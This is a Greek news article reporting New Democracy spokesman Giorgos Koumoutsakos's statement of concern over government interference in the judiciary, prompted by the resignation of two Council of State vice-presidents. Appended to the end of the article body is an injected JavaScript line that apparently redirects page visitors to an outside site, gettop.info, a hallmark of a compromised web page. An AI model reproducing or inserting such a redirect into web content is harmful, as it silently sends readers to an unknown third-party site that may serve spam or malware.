Έντονη ανησυχία για την κατάσταση στην Δικαιοσύνη εκφράζει η ΝΔ

0
7

 

Την έντονη ανησυχία της για την κατάσταση που επικρατεί στη Δικαιοσύνη εκφράζει η ΝΔ, καταγγέλλοντας την κυβέρνηση για παρεμβάσεις.

Σε ανακοίνωσή του, ο εκπρόσωπος του κόμματος, Γιώργος Κουμουτσάκος, με αφορμή την παραίτηση των δύο αντιπροέδρων του ΣτΕ, τονίζει πως «εδώ και καιρό η Νέα Δημοκρατία επανειλημμένα έχει εκφράσει την έντονη ανησυχία και τον προβληματισμό της για την κατάσταση που επικρατεί στην Ελληνική Δικαιοσύνη» κάνοντας λόγο για «σοβαρές δυσλειτουργίες, περίεργες μεθοδεύσεις και απαράδεκτες κυβερνητικές παρεμβάσεις σε αυτήν».

Σύμφωνα με τον κ. Κουμουτσάκο, η σημερινή παραίτηση δύο αντιπροέδρων του Συμβουλίου της Επικρατείας, από μέλη της Ένωσης Δικαστικών Λειτουργών του ΣτΕ, επιβεβαιώνει και ενισχύει ακόμα περισσότερο τις έντονες αυτές ανησυχίες της ΝΔ, ανησυχίες που, για ακόμα μία φορά, όπως τονίζει ο κ. Κουμουτσάκος, υπογράμμισε και ο πρόεδρος του κόμματος, κ. Κυριάκος Μητσοτάκης, με τη χθεσινή δημόσια παρέμβασή του.

«Είναι θέμα δημοκρατικής ευθύνης και καθήκοντος για τη Νέα Δημοκρατία να μην επιτρέψει οποιασδήποτε μορφής υπονόμευση της ανεξαρτησίας της Ελληνικής Δικαιοσύνης» καταλήγει στην δήλωσή του ο εκπρόσωπος της ΝΔ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here